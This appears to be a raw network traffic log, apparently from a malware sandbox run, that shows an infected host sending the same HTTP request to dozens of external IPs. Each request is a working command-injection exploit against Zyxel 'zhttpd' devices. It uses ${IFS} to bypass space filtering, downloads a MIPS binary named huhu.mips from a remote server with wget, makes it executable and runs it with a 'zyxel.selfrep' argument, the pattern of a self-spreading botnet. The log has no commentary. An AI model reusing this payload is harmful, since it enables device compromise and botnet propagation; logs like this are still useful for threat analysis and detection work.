                                      Jan 19, 2024 17:29:24.620758057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2638192.168.2.1445202178.189.16.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620810032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2639192.168.2.143760062.15.200.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620851994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2640192.168.2.1455556114.217.117.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620877028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2641192.168.2.1434868189.160.10.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620909929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2642192.168.2.143803883.57.150.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620944023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2643192.168.2.1444068203.116.243.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.620969057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2644192.168.2.14602225.128.25.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621014118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2645192.168.2.1453264191.222.42.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621052027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2646192.168.2.145166059.110.227.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621069908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2647192.168.2.144220046.12.183.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621129990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2648192.168.2.14334264.135.175.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621175051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2649192.168.2.145993260.110.109.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621192932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2650192.168.2.14514029.19.241.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621234894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2651192.168.2.1459790219.11.164.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621258974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2652192.168.2.1453096204.213.30.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621315002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2653192.168.2.1457456166.11.149.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621337891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2654192.168.2.143763697.86.98.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621366978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2655192.168.2.145474284.69.0.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621426105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2656192.168.2.1448892186.244.108.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621459961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2657192.168.2.1438288165.165.249.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621494055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2658192.168.2.144479681.70.240.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621555090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2659192.168.2.1454512220.130.147.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621584892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2660192.168.2.1446984149.248.113.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621654987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2661192.168.2.14405681.5.216.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621685028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2662192.168.2.145868443.98.44.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621709108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2663192.168.2.144678061.17.253.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621746063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2664192.168.2.144863298.101.225.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621779919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2665192.168.2.143840069.26.239.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621831894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2666192.168.2.1451404188.196.194.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621866941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2667192.168.2.144237044.241.88.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621908903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2668192.168.2.1459620176.10.27.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621922970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2669192.168.2.1449690117.200.47.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.621985912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2670192.168.2.143386267.62.41.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:24.622023106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2671192.168.2.1444644100.43.70.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634226084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2672192.168.2.144432865.103.208.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634268999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2673192.168.2.1455236101.42.173.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634336948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2674192.168.2.145119234.158.132.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634366989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2675192.168.2.145616491.39.106.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634399891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2676192.168.2.1443388117.142.180.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634454966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2677192.168.2.14363768.232.207.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634500027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2678192.168.2.144692024.18.198.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634562016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2679192.168.2.144208039.203.93.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634603977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2680192.168.2.143413261.132.43.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634639978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2681192.168.2.1456968153.102.136.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634671926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2682192.168.2.1456382181.206.97.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634720087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2683192.168.2.1436120140.39.212.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634774923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2684192.168.2.1446800195.0.18.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634805918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2685192.168.2.143540261.194.115.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634850979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2686192.168.2.145406893.96.71.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634886980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2687192.168.2.144479098.108.129.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634936094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2688192.168.2.1447914158.62.224.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.634972095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2689192.168.2.1452092100.155.54.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635008097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2690192.168.2.1445132189.81.144.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635045052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2691192.168.2.1453294154.161.96.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635097980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2692192.168.2.1436422133.202.29.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635119915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2693192.168.2.1453702195.183.43.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635164022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2694192.168.2.145880234.252.12.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635205030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2695192.168.2.1451052172.39.201.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635221958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2696192.168.2.1457178151.49.86.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635257959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2697192.168.2.145419457.210.73.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635288954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2698192.168.2.146075485.109.5.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635338068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2699192.168.2.144615035.250.188.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635365009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2700192.168.2.1434454107.22.253.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.635415077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2701192.168.2.1439514148.60.131.84443
                                      TimestampBytes transferredDirectionData
